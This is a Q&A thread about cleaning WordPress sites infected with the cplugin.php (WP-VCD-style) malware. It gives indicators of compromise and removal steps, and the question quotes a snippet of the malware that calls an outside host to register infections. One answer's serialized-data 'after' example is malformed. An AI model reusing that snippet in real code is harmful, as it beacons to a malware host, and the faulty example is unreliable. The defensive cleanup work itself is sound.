wordpress website 500 error and outages due to cplugin.php file malware

Question

There is a recent attack where numerous wordpress websites are taken down due to a file cplugin.php which is a malware.

The malware is bad written code so for now it is mostly causing 500 server runtime error. But its better to delete it immediately as it migrate to all multiple website on the server and has code to hit a malware url to download additional files. A snippet of the malware code:

if(get_option('log_install') !=='1')
{
    if(!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
    $log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}

I have figured out a solution and posting the answer myself to help all users out there.

Edit:

There are reports of the same file being named differently for users: ccode.php, cplugin.php and helad.php in which case the fix can be modified.

Answer 1

Another way to fix this in 3 step :

1. Delete all entry in wp_option create by the malicious plugin with this request :

DELETE FROM wp_options WHERE option_name='ip_admin' OR option_name="ad_code" OR option_name="cookies_admin" OR option_name="logged_admin" OR option_name="logged_admin" OR option_name="hide_admin" OR option_name="hide_logged_in" OR option_name="display_ad" OR option_name="search_engines" OR option_name="auto_update" OR option_name="log_install"

2. Identify the wild plugin file create in /wp-content/plugins directory (ls -lrtha on linux OS), delete it and create a symbolic link to /dev/null with this same name, with this, the file never been correctly create after. Command line to do this (on linux) :

   ln -s /dev/null mplugin.php

3. Optionnal, but just to avoid any noise in error log, remove nameplugin.php from the wp_options table where option_name = _site_transient_update_plugins.

Answer 2

You used theme or plugin null.

• Please come here to scan the theme: https://themecheck.info/
• This is my theme: https://themecheck.info/score/wordpress-theme-goto-shared-by-wptry-org.html
• They added files class.theme-modules.php in multiple directories, and added the code to the functions.php file

Answer 3

This is not attack, but malware included with nulled plugin or theme you downloaded and installed yourself. It is updated version of WP-VCD - WordFence has a whitepaper with all details about that in WP-VCD: The Malware You Installed On Your Own Site, perhaps we should call it "WP-VCD Reloaded" :)

Indicators of Compromise are plugin files named ccode.php, cplugin.php, helad.php, and mplugin.php (and admin_ips.txt) in wp-content/plugins and plugins / themes with file class.plugin-modules.php or class.theme-modules.php somewhere in their folder.

Cleaning up

1. Find the plugin or theme with malware in class.plugin-modules.php or class.theme-modules.php and delete the plugin or theme (if you need it - purchase it from official source).
2. Delete the malware plugin(s): ccode.php, cplugin.php, helad.php or mplugin.php.
3. Repeat it for all sites under same hosting account / server.

Installation procedure does seem to touch wp-includes/functions.php, but it only tries to remove malware so this is perhaps part of some upgrade from previous malware version.

Answer 4

In the wp-content folder file called cplugin.php and helad.php in which case the fix can be modified. delete it immediately as it migrates to all multiple websites on the server and has code to hit a malware URL to download additional files.

Answer 5

There was no entry in the db on our sites but the call codes were added to the bottom of functions.php in the wp-includes folder. Removing the offending call and the sites popped right up. :)

Answer 6

This seems like some sort of global attack. There is a file cplugin.php in the plugins folder which is causing the downsite. Deleting the file is of no use as it re-appears. Also it will infect all other sites on a multi website server. Fortunately after working for hours have figured out the fix. Please read this carefully to fix your site:

1. Backup your database and files

2. Edit your wp_options table, find the property active_plugins and edit it, you will see it has a plugin entry for cplugin.php. We have to delete it. Your initial data will look something like this:

a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"cplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

Edit this to remove the cplugin.php entry , start from i upto the next ; and remove that. (Make sure you Database it backed up incase you make some mistake). The new entry without the cplugin.php will look like:

a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

3. Follow this step similarly for the field in wp_option table named site_transient_update_plugins

before: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"cplugin.php";s:3:"1.0";s:32:"duplicate-page/duplicatepage.php";.....

after: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"duplicate-page/duplicatepage.php";.....

4. After updating your fields, navigate back to your main plugins folder /wp-content/plugins and delete the file cplugin.php

5. Login to your wordpress dashboard and re activate all your plugins

Voila you have fixed your website.

I think the technical reason for this would be that the malware registers itself as a wordpress plugin which automatically replaces the file upon deletion. Fortunately the malware is badly written code so instead of running it mostly throws 500 error. But in anycase I would recommend to delete it immediately incase it updates.

Edit: According to the wordpress forum thread on this topic, for some users simply renaming the file also makes the website work, which is probably due to the fact that renaming files in wordpress deactivates the plugin, due to which websites start working. But I would not keep infected files renamed and stored in anycase, so would recommend the 1st solution atleast after gaining access to the site.